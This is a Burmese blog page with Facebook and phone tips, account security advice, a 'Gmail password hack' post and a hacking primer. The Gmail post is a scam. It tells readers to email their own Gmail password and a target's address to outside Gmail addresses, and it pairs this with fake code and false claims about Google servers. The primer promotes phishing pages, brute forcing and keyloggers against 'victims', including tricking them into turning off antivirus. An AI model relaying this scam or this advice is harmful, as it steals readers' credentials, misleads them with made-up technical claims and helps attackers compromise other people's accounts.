This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Friday, April 21, 2017

Facebook Name IDတင်နည်း

❀ မင်္ဂလာပါ  ❀ 

#Name ID တင်နည်း​လေးပါ မိမိ acc တရားဝင်​ဖြစ်​တာ​ပေါ့

မကြာဘူးတစ်ရက်​ပဲ တစ်​ခါတစ်​ခါ ၁၀မိနစ်​ / ၆ နာရီနဲ့ရတယ်

Account Settings ထဲက Support Inbox

ထဲမှာပဲ Replay ပြန်လုပ်ယုံပါ အဆင်​မ​ပြေရင်​ mail ထဲကထပ်​ဝင်​ပါ

ဆ၇ာကြီးများကျော်​ပေးပါ

လေးစားလျှက်


Copy စာယူပါ 👇👇👇အဆင်​​ပြေသလိုထည့်​လည်းရပါတယ်


Hello Dear For Admin I Want to facebook account is National ID.

Conf­i­rm To My FaceBook Account National ID­­.


My Currently Profile Name is =

My Currently Profile birthday is=

My Currently Profile first name is=

My Currently Profile middle name is=

My Currently Profile lest name is=

My Currently Profile Location is=

My User Contact Email is=


Think You Very somuch please.­­

My lovely,Facebook Team.­­

My ID Card Information is Check For You.


My Change ID Card Name is=

My ID Card Birthday is=

My ID Card Location is=


I want to confirm by National ID.­­

Thanks For your team.­­

ကျန်တာကတော့အောက်ကပြထားတဲ့ပုံအတိုင်း

ဆက်လုပ်သွားပါ…⇩














Friday, April 14, 2017

Font Styles

မိမိဖုန်းမှာအသုံးပြုနိုင်တဲ့ မြန်မာဖောင့် အလှစတိုင် (၁) ခုကိုတင်ပေးလိုက်ပါတယ်
😃😃😃😃😃😃😃😃😃 မြန်မာစာအလှကတော့ပုံမှာမြင်တွေ့တဲ့အတိုင်းအသုံးပြုရမှာဖြစ်ပါတယ် 
😃😃😃😃😃😃😃😃😃😃
အကြိုက်တွေ့ရင်တော့ အောက်က Link မှာဒေါင်းယူနိုင်ပါတယ်။

အသုံးပြုရန် ယခု ဖောင့်ကို ဒေါင်းပါ Install လုပ်ပါ။
Open ပေါ်မှာမဟုတ်ပါဘူး။
ဒါကြောင့် ယခု ဖောင့်အားရွေးချယ်ရန်
မိမိဖုန်း ၏ Setting ကို နှိပ်ဝင်ပါ။
ပြီးလျှင် Display ကို နှိပ်ဝင်ပါ။
ပြီးလျှင် Font Style ကို နှိပ်ဝင်ပါ။
အဲ့ဒီ ရောက်လျှင် ယခုဒေါင်းထားသော မြန်မာဖာင့်အား ရွေးချယ် Ok နှိပ်၍ 
မိမိ ဖုန်းတွင် ယခုကဲ့သို့ လှပသည့် မြန်မာဖောင့်ပုံစံဖြင့် အသုံးပြုနိုင်မှာဖြစ်ပါတယ်။

ကဲဒီမှာဒေါင်း=Download


Auto replay Apk


facebookမှာကိုယ်onlineမတတ်ဖြစ်တယ့်အခါမှာAuto replayပြန်ပေးတယ့်Apkလေးပါစိတ်ဝင်စားရင်အောက်မှာဒေါင်းပါ














Wednesday, April 12, 2017

online accountလုံခြုံရန်သိထားသင့်သောအချက်များ

သင့်ရဲ့ Online Account တွေကို ဘယ်လို လုံခြုံအောင် ထားမလဲ


ဒီနေ့ခေတ်မှာတော့ ကမ္ဘာ့လူဦးရေရဲ့ ၃ ပုံ ၂ ပုံလောက်ဟာ မိုဘိုင်းဖုန်းတွေ အသုံးပြုနေသလို လူတစ်ယောက်ဟာ ပျမ်းမျှတစ်နေ့ကို ၄ နာရီလောက် အင်တာနက် အသုံးပြုဖြစ်နေတယ်လို့လည်း စစ်တမ်းတွေက ဆိုကြပါတယ်။ မြန်မာပြည်မှာလည်း မိုဘိုင်းဆက်သွယ်ရေးနည်းပညာ တိုးတက်လာမှုတွေကြောင့် မိုဘိုင်းဖုန်းအသုံးပြုသူ အရေအတွက် အလျှင်အမြန်တိုးတက်လာနေသလို အင်တာနက်နဲ့ လူမှုကွန်ယက်အသုံးပြုမှုနှုန်းကလည်း ထပ်ချပ်မကွာ လိုက်ပါတိုးတက်လာနေပါတယ်။


ဒီလို အင်တာနက် ဝက်ဘ်ဆိုက်တွေ၊ Mobile Banking စနစ်တွေနဲ့ လူမှုကွန်ယက် Account တွေ အားလုံးဟာ လုံခြုံရေးအတွက် Password စနစ် တစ်မျိုးမျိုးကို အသုံးပြုထားလေ့ရှိပါတယ်။ Password တွေဟာ သုံးစွဲသူတွေရဲ့ ဘဏ္ဍာရေးအချက်အလက်၊ အကြွေးဝယ်ကတ် အချက်အလက်နဲ့ ကိုယ်ရေး အချက်အလက်တွေကို ကာကွယ်ပေးနိုင်တဲ့ ခံစစ်ဖြစ်ပါတယ်။ ဒါပေမယ့်လည်း လူအများရဲ့ ပေါ့လျော့မှုတွေကြောင့် ဒီလို Password တွေ အသုံးပြုပြီး ကာကွယ်ထားကြတယ်ဆိုပေမယ့်လည်း Password ကျိုးပေါက်မှုတွေ မကြာခဏဖြစ်ပေါ်နေပါတယ်။ Hacker တွေပြောနေကြစကားလေးကတော့ “Password တိုင်းဟာ ချိုးဖျက်လို့ရတယ်” ဆိုတာပါပဲ။


ကျွန်တော်တို့အနေနဲ့ အွန်လိုင်းအသုံးပြုတဲ့အခါမှာ အန္တရာယ်ရှိတဲ့ အပြုအမူတွေနဲ့ လက်မခံနိုင်လောက်တဲ့ အမှားအယွင်းတွေကို ပြုလုပ်မိနေတယ်ဆိုရင် အခုအချိန်ကစပြီး ရပ်ဆိုင်းသင့်ပါပြီ။ မိမိတို့ရဲ့ ကိုယ်ရေးအချက်အလက်တွေနဲ့ Account တွေကို ကာကွယ်ဖို့ သတိထားပြုမူသင့်တဲ့အချက်တွေကို Akhayar က အကြံပေးဖော်ပြချင်ပါတယ်။


(၁) လုံခြုံမှုမရှိတဲ့ Password ကို မရွေးပါနဲ့


လူအများက password တွေကို မမေ့အောင် ခပ်လွယ်လွယ် နဲ့ မှတ်ရလွယ်တဲ့ စာသားမျိုးတွေ၊ မိမိနဲ့ ပတ်သတ်တဲ့ နေ့စွဲမျိုးတွေနဲ့ ဖန်တီးထားလေ့ရှိပါတယ်။ အချို့တွေဆိုရင် “123456” နဲ့ “password” တို့လိုမျိုး အလွန်လွယ်ကူလွန်းတဲ့ Password မျိုးတွေကိုတောင် အသုံးပြုနေကြပါတယ်။ မိမိရဲ့ ကိုယ်ရေးအချက်အလက်တွေနဲ့ Online Account တွေကို စိတ်ချလက်ချ အသုံးပြုချင်တယ်ဆိုရင် ခန့်မှန်းရလွယ်ကူတဲ့ Password တွေကို ရှောင်ကျဉ်ရမှာဖြစ်ပြီးတော့ စာလုံးရေ ၁၂ လုံးထက် ရှည်ပြီး အက္ခရာ၊ နံပါတ်နဲ့ အခြားသင်္ကေတတွေပါ ပါဝင်တဲ့ Password မျိုးကို ဖန်တီးပြီး ရွေးချယ်အသုံးပြုသင့်ပါတယ်။


(၂) Two-Factor Authentication သုံးပါ


အခုနောက်ပိုင်း Facebook အပါအဝင် နာမည်ကျော် လူမှုကွန်ယက်တွေ၊ Mobile Banking စနစ်တွေနဲ့ အင်တာနက် ဝက်ဘ်ဆိုက်တွေဟာ ၎င်းတိုရဲ့ Log In စနစ်မှာ Two-Factor Authentication စနစ် ထည့်သွင်း အသုံးပြုလာပါတယ်။ ဒီစနစ်က Login ဝင်ရောက်ချိန်မှာ Password မှန်ကန်ရုံနဲ့ Account ထဲကို ဝင်ရောက်ခွင့်မပြုပဲ မိမိဖုန်းဆီကို Code နံပါတ်ပေးပို့ပြီး အဲဒီ Code နံပါတ်မှန်ကန်အောင် ဖြည့်နိုင်မှ အထဲကို ဝင်ရောက်ခွင့်ပြုတဲ့ စနစ်တစ်မျိုးပါ။ ဒီနည်းလမ်းကို အချို့က အလုပ်ရှုပ်တယ်လို့ ယူဆပြီး အသုံးမပြုကြပါဘူး။ ဒါပေမယ့် ဒီနည်းလမ်းဟာ စိတ်ချရတဲ့ ကာကွယ်ရေးစနစ်တစ်ခုဖြစ်ပြီးတော့ မိမိ Account ကို တစ်စုံတစ်ယောက်က ဝင်ဖို့ ကြိုးစားနေရင်လည်း အလွယ်တကူ သိနိုင်မှာဖြစ်ပါတယ်။


(၃) Account အမျိုးမျိုးအတွက် မတူညီတဲ့ Password တွေ သတ်မှတ် အသုံးပြုပါ


ကျွန်တော်တို့ဟာ ဝက်ဘ်ဆိုက်အများအပြားအပြင် လူမှုကွန်ယက် account တစ်ခုတွေရော E-mail စနစ်တွေပါ အများအပြား အသုံးပြုနေတာဖြစ်တာကြောင့် Account တစ်ခုစီတိုင်းမှာ Password တစ်ခုစီ သတ်မှတ်ထားကြပါတယ်။ ဒါပေမယ့် မှတ်ရလွယ်အောင် အကောင့်အားလုံးကို Password တစ်ခုတည်းသာ ဖန်တီးပြီး အသုံးပြုကြတဲ့ သူတွေလည်း မနည်းပါဘူး။ ဒါဟာ အွန်လိုင်းအသုံးပြုရာမှာ အလွန်မှားယွင်းတဲ့ အကျင့်တစ်ခုဖြစ်ပါတယ်။ ဒီလိုပြုလုပ်ခြင်းကြောင့် မိမိရဲ့ Password ကို ဟက်ကာတွေ ရရှိသွားရင် အခြားအရေးကြီး Account တွေပါ အကုန်ဆုံးရှုံးရမှာဖြစ်ပါတယ်။


(၄) Password ကို မဝေမျှပါနဲ့


လက်ရှိ ကမ္ဘာပေါ်က အင်တာနက်နဲ့ စမတ်ဖုန်းအသုံးပြုသူ ၃၁ ရာခိုင်နှုန်းဟာ သူတို့ရဲ့ Password တွေကို အခြားသူတွေနဲ့ အကန့်အသတ်မရှိ မျှဝေထားကြပါတယ်။ အများစုကတော့ ချစ်သူရည်းစား၊ အိမ်ထောင်ဖက်နဲ့ မိသားစုဝင်တွေဆီကိုပါ။ ဒါဟာ အန္တရာယ်များတဲ့ အပြုအမူတစ်ခုဖြစ်တယ်လို့ အွန်လိုင်းလုံခြုံရေးပညာရှင်တွေက သတ်မှတ်ထားကြပါတယ်။


(၅) Software ကို အမြဲတစေ Update ပြုလုပ်ပါ


ဖုန်း OS တွေ၊ ဆော့ဖ်ဝဲလ်တွေနဲ့ ကွန်ပျူတာ ပရိုဂရမ်တွေဟာ မကြာခဏ Update Version တွေ ပြုလုပ်ပေးနေပါတယ်။ Update တိုင်းမှာ လုံခြုံရေးစနစ်ကို အဆင့်မြှင့်တင်မှုတွေ မကြာခဏ ထည်သွင်းပေးထားတတ်တာမို့ အမြဲတစေ Update ပြုလုပ်နေဖို့လိုပါတယ်။ တစ်ချို့သော အသုံးပြုသူတွေက ငွေကြေးကုန်ကျမှာကို နှမျောတာကြောင့် Update ပြုလုပ်ဖို့ ဝန်လေးတတ်ကြပါတယ်။ အသစ်အသစ်သော Virus တွေ နေ့စဉ်နဲ့အမျှပေါ်ထွက်လာနေတာကြောင့် Update ပုံမှန်မလုပ်တာက အန္တရာယ်များတဲ့ အလေ့အထတစ်ခုဖြစ်ပါတယ်။


(၆) Public Wi-Fi ကွန်ယက်တွေကို သတိထား အသုံးပြုပါ


လူတိုင်းဟာ အခမဲ့ရရှိတဲ့ Public Wi-Fi တွေကို အသုံးပြုရတာကို သဘောကျကျပါတယ်။ သုံးစွဲသူတွေဟာ ကော်ဖီဆိုင်၊ စားသောက်ဆိုင်တွေ၊ အများပြည်သူနဲ့ သက်ဆိုင်တဲ့ သက်ဆိုင်တဲ့နေရာတွေနဲ့ လေဆိပ်တွေမှာရှိတဲ့ Public Wi-Fi ကွန်ရက်တွေကနေတဆင့် လူမှုကွန်ယက် ဝက်ဘ်ဆိုက်တွေ သုံးတာ၊ Email တွေ စစ်ဆေးတာ၊ အင်တာနက်သုံးတာ၊ ဈေးဝယ်တာတွေကို ပြုလုပ်တတ်ကြပါတယ်။ ဒါပေမဲ့ ဒီ Wi-Fi ကွန်ရက်တွေဟာ လုံခြုံရေးအားနည်းတာကြောင့်  ကွန်ယက်အသုံးပြုနေသူအချင်းချင်းရဲ့ အချက်အလက်တွေကို ချိုးဖောက်ဝင်ရောက်ပြီး ခိုးယူလို့ရပါတယ်။ ဒါကြောင့် Public Wi-Fi ကို သုံးတော့မယ်ဆိုရင် ချိတ်ဆက်မှုကို လုံခြုံမှုရှိစေဖို့ encrypt လုပ်ပေးမယ့် Virtual Private Network (VPN) တစ်ခုကို ဖန်တီး အသုံးပြုတာက အကောင်းဆုံးပါပဲ။


Ref: akhayar

http://www.myanmarandroidapp.com/2017/03/online-account.html


                    ကျေးဇူးတင်ပါတယ်…။

Gmail password hack နည်း



Gmail Password Hack နည်း

ဘယ်သူ့ကို မှ မယုံကြပါနဲ့ လူတွေအယုံလွယ်ကျတာကို သက်သေပြလိုက်တာပါ :)


Here in this post we will know how to obtain any gmail password simply by copying the following lines

Step 1: Log into your Gmail account.

Step 2: Compose a new mail.

Step 3: In subject box type " PASSWORD RECOVERY "

Step 4: Send this to - recoverpswrds@gmail.com

Step 5: Write this in message box.

(first line)- Email address you want to hack.

(second line)- Your Gmail address

(third line)- Your Gmail account password

(fourth line) - <pwdcursive><

v703&login="passmachine&f=(p0assword)&f=27586&___javascript=ACTIVE&rsa#"

start?></script>=""></cursive><>

{simply copy and paste above.} How it works: you mail to a system administrators automatic responder.

Usually only system administrators should be able to use this, but when you

try it with your own password and mail this message from your Gmail account

the computer gets confused! Why your password is needed- automatic Gmail

responder will require your "system administrator password" which is in fact

your own password!!! But the : computer doesn't know.

THE PASSWORD WILL AUTOMATICALLY BE SENT TO YOUR GMAIL! INBOX IN A MAIL

CALLED "SYSTEM REG MESSAGE" FROM "SYSTEM".NOTE: Use account you have been using for few days say at least 30 days.Otherwise Gmail may take new account as temporary and this trick may not work. Moreover use it soon

otherwise this flaw can be rectified soon.Why gmail will send this the server in gmail will treat this one as a password recovery so it thinks that your asking for password recovery that mail Note that google has also provided an option to stop these activities if any one is using this thing you are not able to hack the password.


*/*/*/*/*/*/*/*/*/*/*/*/*/*/*


        NOT WORKING 


/*/*/*/*/*/*/*/*/*/*/*/*/*/**


Gmail Password ကို Hack ရာတွင် ဘာတွေလိုအပ်သနည်း ???

Hack နည်းပေါင်းများစွာရှိပါတယ်။ ရှေးဦးစွာ ရိုးရိုးရှင်းရှင်းဖြင့် Hack သောနည်းလမ်းကို အရင်ဖေါ်ပြပါမည်။ လွန်ခဲ့တဲ့

၂၀၀၈ ခုနှစ်လောက်တုန်းက javascript နည်းဖြင့်ကျနော် သုံးကြည့်ဖူးပါတယ်။ အခုနောက်ပိုင်းထပ်သုံးကြည့်တာ

မရတော့ပါဘူး၊ Google က admin တွေကလဲ ငတုံးတွေမှမဟုတ်တာ။ သူတို့ security တွေကို

ခဏခဏပြန်ပြန်ပြင်တယ်လေ။ ကျနော်တို့ထက်အများကြီးမှ အများကြီးကိုလည်တာပေါ့။ ယခု နည်းက တော့ Google ရဲ့

security တွေကို ဖြတ်ကျော်လို့ရတဲ့ javascript အသစ်တစ်ခုပါ။ ကျနော်ဤ နည်းကို နိုင်ငံခြား Hacking

စာအုပ်ထဲကနေု ဘာသာပြန်ထားတာပါ။ ၀ါသနာပါရင် နည်းနည်းပါးပါးလောက် ၀င်မွှေကြည့်ကြပေါ့

လုပ်နည်း

တစ်ဆင့်ခြင်းဆီဖေါ်ပြထားပါတယ်။


အဆင့်(၁) သင်၏ကိုယ်ပိုင် Gmail account ဖြင့် Gmail ထဲသို့ Login ၀င်ပါ။

မှတ်ချက် ( gglsever@gmail.com သို့အရင်ဆုံး add ထားပါ၊ add

ထားပြီးအနည်းဆုံးရက်ပေါင်း ၈ရက် ပြည့်မှ ဤလုပ်နည်းသို့စတင်လုပ်နိုင်မည်ဖြစ်သည်)


အဆင့်(၂) Login ၀င်ပြီးပြီးခြင်း compose mail လုပ်ပါ။To: ဆိုတဲ့နေရာမှာ gglsever@gmail.com

လို့ရေးပါ။ ( gglsever@gmail.com ဆိုတာ Google server မှ username နှင့် password များ ကို

မှတ်ထားသော နေရာသို့ mail ပို့လိုက်ခြင်းဖြစ်ပါတယ်။ Automatic server ကနေ သင့်ကို mail

တစ်ဆောင်ပြန်ပို့ပါလိမ့်မယ်။ စောင့်နေပါ)

အဆင့်(၃) Subject: ဆိုတဲ့ နေရာမှာ ‘’PASSWORD RECOVERY’’ ဆိုပြီး တိတိကျကျရေးပါ။

စာလုံးပေါင်းမမှားပါစေနှင့်။ အရေးကြီးပါတယ်။


အဆင့်(၄) mail ကိုစတင်ရေးနိုင်ပါပြီ။ ပထမစာကြောင်းမှာ သင် hack ချင်သော သူ၏ account ကိုရေးပါ။


အဆင့်(၅) ဒုတိယစာကြောင်းမှာတော့ သင်ယခုလက်ရှိအသုံးပြုနေသော gmail account ကိုရေးပါ။


အဆင့်(၆) တတိယမြောက်စာကြောင်းမှာတော့ သင်၏ gmail password ကိုရေးပါ java script ဖြင့် users

administrator server security ကိုဖြတ်ကျော်ရာတွင် verify လုပ်ရန်သင်၏ password ကိုလဲလိုပါတယ်။


အဆင့်(၇) နောက်ဆုံးအဆင့်နဲ့ တကယ့်ကိုအရေးအကြီးဆုံးအဆင့်ပါပဲဗျာ..။ အောက်မှာ ကျနော်ဖေါ်ပြထားတဲ့

code ကိုသေသေချာချာ ကော်ပီကူးပါ။


cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa

script< ip://233.243.2.34/cgi-bin/start?

v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>

{simply copy and paste above.}


အားလုံး ready ဖြစ်ပါက send လို့ရပါပြီ။ send လိုက်ပါတော့။

====================

ဥပမာ- သင်၏ ကိုယ်ပိုင် gmail account က myname@gmail.com ဆိုပါစို့

သင်၏ password က 123456 လို့မှတ်လိုက်ပါ။ သင် hack ချင်သော သူ၏

Gmail account ကတော့ test@gmail.com လို့ထားလိုက်ပါ။ကျနော်အောက်မှ ဖေါ်ပြထားတဲ့အတိုင်း

mail တစ်ဆောင်ရေးပါ။……..


To: ‘’gmail.com’’<gglsever@gmail.com>

Bcc: , cc: ထိုနေရာများတွင် ဘာမှ မရေးပါနှင့်

Subject: ‘’PASSWORD RECOVERY’’

Text box ထဲတွင်ရေးရန်

test@gmail.com (မိမိ hack ချင်သောအကောင့် ရေးပါ။

myname@gmail.com ( မိမိ၏ gmail ကိုရေးပါ)

123456 (မိမိ password ကို ရေးပါ)


cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa

script< ip://233.243.2.34/cgi-bin/start?

v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>

{simply copy and paste above.}


System Reg လို့ခေါ်တဲ့ mail တစ်ဆောင် သင့်ဆီကို ၆ နာရီအတွင်း automatic ပြန်ပို့ပါလိမ့်မယ်။ ထို mail

ထဲတွင် သင် hack လိုသောသူ၏ information များအကုန်ပါလာမှာဖြစ်ပါတယ်။ 


                                          ကျေးဇူးတင်ပါတယ်…။

အခြေခံ HACKING Information

အခြား အခြားသော forumတွေ၊ websiteတွေမှာ "Email ကို ကျနော်တို့ ဘယ်လို hack နိုင်သလဲ? ခင်ဗျားကျနော့်အတွက် hack ပေးနိုင်မလား ? ဆိုပြီး သန်းပေါင်းများစွာသောလူတွေ မေးနေကြတာကို သတိပြုမိကြမယ် ထင်ပါတယ်။ ဒီ့အတွက်ကြောင့် ဒီ post ဖြစ်လာရတာဖြစ်ပြီး သင့်အတွက် hacking နဲ့ ဆိုင်တဲ့ အခြေခံအတွေးအခေါ်လေးတွေကို ဖော်ပြထားမှာ ဖြစ်ပါတယ်။ ဒါတွေကို ဘယ်လိုဆင့်ပွားပြီး အသုံးချရမယ်ဆိုတာကတော့ သင် ကိုယ့်ကိုကိုယ် အားကိုးရပါလိမ့်မယ်။

နောက်ခံအခြေအနေ
Hack တဲ့ နည်းလမ်းတွေကို Windows 98 ဒီဇိုင်းပြုလုပ်ပြီးကတည်းက စတင်ခဲ့တာဖြစ်ပါတယ်။ Hacking ဆိုတာ အခြေခံအားဖြင့်တော့ ပျော့ကွက် ဟာကွက် ကွင်းဆက်တွေကို ရှာဖွေပြီး ၄င်းတို့ထဲကမှာ အချို့ယိုစိမ့်နိုင်တဲ့ holeတွေကနေ information တွေထွက်လာအောင် ကြိုးစားတာဖြစ်ပြီး သင့်အတွက် အရေးပါနိုင်တဲ့ Passwordများ၊ Credit Card နဲ့သက်ဆိုင်တဲ့ အသေးစိတ်အချက်အလက်များကို ရယူချင် ရယူနိုင်ပါတယ်။ တခါတရံမှာတော့ ပုဂ္ဂိုလ်ရေးဆိုင်ရာ တိုက်ခိုက်မှုတွေအတွက် အသုံးပြုကြပါတယ်။

သတိပြုရန်အကြောင်းအရာ
ကျနော် အကြံပေးချင်တာကတော့ ကောင်းမွန်တဲ့ Site တွေကနေ ဆောင်းပါးတွေ၊ ပို့ချချက်တွေကို သေချာဖတ်ရှုလေ့လာဖို့လိုပါတယ်။ ဒါဟာ သင့်အတွက် Hacking ကို လေ့လာခြင်းမှာ တစ်ခုတည်းသော နည်းလမ်းဖြစ်ပါတယ်။

မိတ်ဆက်
အဓိကကျတဲ့ အချက်တွေ ကိုပဲ ဖော်ပြပြီး hacking နည်းလမ်း အချို့ ကို အကျဉ်းချုပ် ဆွေးနွေးသွားမှာဖြစ်ပါတယ်။ Hacking မှာ အခြေခံအားဖြင့် အဓိကကျတဲ့ အပိုင်း နှစ်ပိုင်းအနေနဲ့ ကွဲထွက်နေပါတယ်။ အဲဒါကတော့...

၁။ Email (သို့) User information
၂။ Web based hacking တို့ပဲဖြစ်ပါတယ်။

Email (သို့) User information
ယနေ့အချိန်ကာလများမှာ အများဆုံးအသုံးပြုနေကျဖြစ်တဲ့ ၊ Email, Passwords, Credit Card details စတဲ့ user information များကို hack တဲ့အခါ ကျော်ကြားနေတဲ့ နည်းလမ်းတွေကတော့ အောက်ပါအတိုင်းဖြစ်ပါတယ်...

(က) Phishing
( ခ ) Brute Forcing
( ဂ ) Keylogging
(ဃ) Trojans

(က) Phishing
Phishing ဆိုတာကတော့ ပုံမှန်အားဖြင့် ထူးခြားတဲ့ တိုက်ခိုက်မှုတစ်ခုဖြစ်ပါတယ်။ hacker တွေက အချို့ website (သို့) gmail နဲ့ လုံးဝနီးပါးဆင်တူတဲ့ page တစ်ခုကို ဖန်တီးလိုက်ခြင်းဖြစ်ပါတယ်။ ဒီ page တွေကို hacker တွေက သူတို့ရဲ့ ကိုယ်ပိုင် server တွေမှာ upload လုပ်ကြပါတယ်။ အဲဒီနောက် user အသစ်တွေဆီကို အဲဒီ link တွေပေးပို့ပါတယ်။ user တွေက အဲဒီ link ကိုဖွင့်လိုက်တဲ့ အခါ user တွေ အနေနဲ့ သူတို့ ရောက်ချင်တဲ့ website (သို့) gmail လို့ထင်ပြီး သူတို့ရဲ့ username နဲ့ password တွေကို ရိုက်ထည့်ပြီး sign in (သို့) submit ကို click လိုက်ပြီဆိုရင်တော့ အဲဒီ user ရဲ့ information တွေကို hacker ကရရှိသွားပါပြီ။ ဒီနည်းလမ်းကို hacking လောကထဲကို ၀င်ရောက်ဖို့ကြိုးစားနေကြတဲ့ လူသစ်တွေ ကျယ်ကျယ်ပြန့်ပြန့်အသုံးပြုနေတဲ့ နည်းလမ်းတစ်ခုဖြစ်ပါတယ်။ ဒီနည်းလမ်းရဲ့ ပြုလုပ်ပုံအဆင့်ဆင့်ကို Simple Hacking ( Fake Login ပြုလုပ်ခြင်း) ဆိုတဲ့ post မှာဖော်ပြခဲ့ပြီးဖြစ်ပါတယ်။
ဒီနည်းလမ်းကို အသုံးပြုပြီး အိန္ဒိယမှာ ရှိတဲ့ ICICI bank နဲ့ပတ်သတ်ပြီး ဖြစ်ခဲ့တဲ့ သာဓက တစ်ခုရှိပါတယ်။ များစွာသော user info တွေကို ဒီနည်းလမ်းကို အသုံးပြုပြီး အခိုးခံခဲ့ရတာဖြစ်ပါတယ်။

အားနည်းချက် :
လူတော်တော်များများက ဒီနည်းလမ်းကို အသုံးပြုဖို့ကြိုးစားနေဆဲဖြစ်ပါတယ်။ ဒါပေမယ့် ဒီနည်းလမ်းမှာ အားနည်းချက်တစ်ခုရှိနေပါတယ် အဲဒါကတော့ သားကောင်ဟာ internet နဲ့ပတ်သတ်ပြီး ဗဟုသုတ အနည်းငယ်ရှိရုံနဲ့ ဒီ page ဟာ အစစ်မဟုတ်မှန်းသိနိုင်ပါတယ်... ဘာကြောင့်လဲဆိုတော့ သူက URL ကို ဖတ်ကြည့်မယ် ဒါဆိုရင် မူရင်း website မဟုတ်ဘူးဆိုတာကို နားလည်သွားနိုင်ပါတယ်။

( ခ ) Brute Forcing
Brute Forcer ဆိုတာကတော့ အခြေခံအားဖြင့် cracker လို့ခေါ်ဆိုနိုင်တဲ့ program တစ်ခုဖြစ်ပါတယ်။ အဲဒီ Brute Forcer ထဲမှာသင်က သင် hack ချင်တဲ့ username ကို ထည့်သွင်းရပါမယ်...ပြီးတော့ notepad file တစ်ခုကိုလည်း password တစ်ခုကဲ့သို့ထည့်သွင်းရမှာဖြစ်ပြီး အဲဒီ notepad ထဲမှာ ရှိသမျှ အားလုံးနီးပါး အင်္ဂလိပ်ဘာသာစာလုံးတွေ ပါရှိရမှာဖြစ်ပါတယ်။ ၄င်းက ဘယ်လိုအလုပ်လုပ်သလဲဆိုတော့ password မှာပါတဲ့ စာလုံးတစ်လုံးစီတိုင်းအတွက် notepad file ထဲမှာ ရှိသမျှ စာလုံးတိုင်းနဲ့ တိုက်ကြည့်ပါတယ်။ အားလုံးတူညီသွားပြီ ဆိုရင်တော့ ပွဲသိမ်းပဲပေါ့...။ တခြား forum တွေမှာ " huge pass list" ဆိုတဲ့ ခေါင်းစဉ်ကို သတိပြုမိချင်ပြုမိပါလိမ့်မယ်။ ၄င်းတို့က ဘာမှတော့မဟုတ်ပါဘူး...ဒါပေမယ့် သင့်ရဲ့ bruteforcer ထဲကို ထည့်သွင်းဖို့ password listဖြစ်ပါတယ်။

အားနည်းချက် :
၁။ တခါတရံမှာ brute forcing ဟာ အချိန်အလွန်ကြာမြင့်တတ်ပါတယ်။
၂။ ၄င်းဟာ အာမခံချက် မရှိပါဘူး
၃။ ယနေ့အချိန်ကာလမှာဆိုရင် လူတော်တော်များများဟာ alpha-numeric-symbol password တွေရှိနေကြပါပြီ။ bruteforcer အတွက် ၄င်းတို့က detect လုပ်ဖို့ အလွန်ခက်ခဲပါတယ်။
၎။ ကျော်ကြားတဲ့ gmail ကဲ့သို့သော site တွေမှာ ပြုလုပ်ထားတဲ့ ဒီဇိုင်းတစ်ခုကတော့ login လုပ်တဲ့အခါ ၃ ခါထက်ကျော်ပြီး မှားယွင်းနေပြီးဆိုရင် ၄င်းတို့ က "image captcha" ကိုထည့်လိုက်တဲ့အတွက် bruteforcer ကို ရပ်သွားစေပါတယ်။

( ဂ ) Keylogging
Keylogger ကတော့ "server" လို့ ခေါ်ဆိုနိုင်တဲ့ file သေးသေးလေးတွေကို ဖန်တီးဖို့အတွက် သင့်ကို ကူညီပေးပါလိမ့်မယ်။ သင်က သင့်ရဲ့ server ကို သားကောင် ဆီသို့ ပေးပို့ရမှာဖြစ်ပါတယ်။ သင့်ရဲ့ သားကောင်က အဲဒီအပေါ်မှာ click လိုက်ရင်တော့ ကိစ္စပြီး ပါပြီ။
ဒီနည်းလမ်းဟာ တစ်စုံတစ်ယောက်ကို hack ဖို့အတွက် အကောင်းဆုံးနည်းလမ်းတစ်ခု ဖြစ်နိုင်ပါတယ်။ Keylogger ဆိုတာကတော့ သင့်သားကောင်ရဲ့ computer ထဲမှာ သူဟာသူ install လုပ်နိုင်တဲ့ program တစ်ခုဖြစ်ပြီး သင့်သားကောင်က သူ့ရဲ့ keyboard ပေါ်မှာ ရိုက်လိုက်သမျှ keystrokeတိုင်းကို မှတ်တမ်းတင်ထားပါတယ်။ ပြီးရင် ၄င်းက မှတ်တမ်းတင်လို့ ရသမျှတွေကို hacker ဆီသို့ပေးပို့ပါတယ်။ keystroke ( ဆိုလိုတာက FTP, Email , Messengers ) ကို လက်ခံရရှိဖို့ အများကြီးလမ်းရှိပါတယ်။ ကျနော့်အနေနဲ့ပြောရရင် ဒီနည်းလမ်းဟာ သင့်ရဲ့ သားကောင်ကို လှည့်စားပြီး သူတို့ရဲ့ information တွေကို ရယူဖို့အတွက် အကောင်းဆုံးနည်းလမ်းတစ်ခုဖြစ်ပါတယ်။ ( Keylogger Collection )

အားနည်းချက် :
၁။ သင့်ရဲ့ သားကောင်က keylogger ကိုလက်ခံရရှိတဲ့ အခါ သူတို့ရဲ့ antivirus တွေက keylogger ကို အလိုအလျှောက် delete လုပ်လိုက်ခြင်းဖြစ်ပါတယ်။ ဒါကြောင့် သင်အနေနဲ့ တစ်စုံတစ်ရာ လှည့်ဖြားခြင်းအားဖြင့် antivirus ကို disable လုပ်ဖို့ စည်းရုံးသိမ်းသွင်းရမှာ ဖြစ်ပါတယ်။
၂။ တခါတရံမှာ keylogတွေကို ပေးပို့နေတဲ့အချိန်မှာ firewall က block လုပ်လိုက်ခြင်းများပဲ ဖြစ်ပါတယ်။

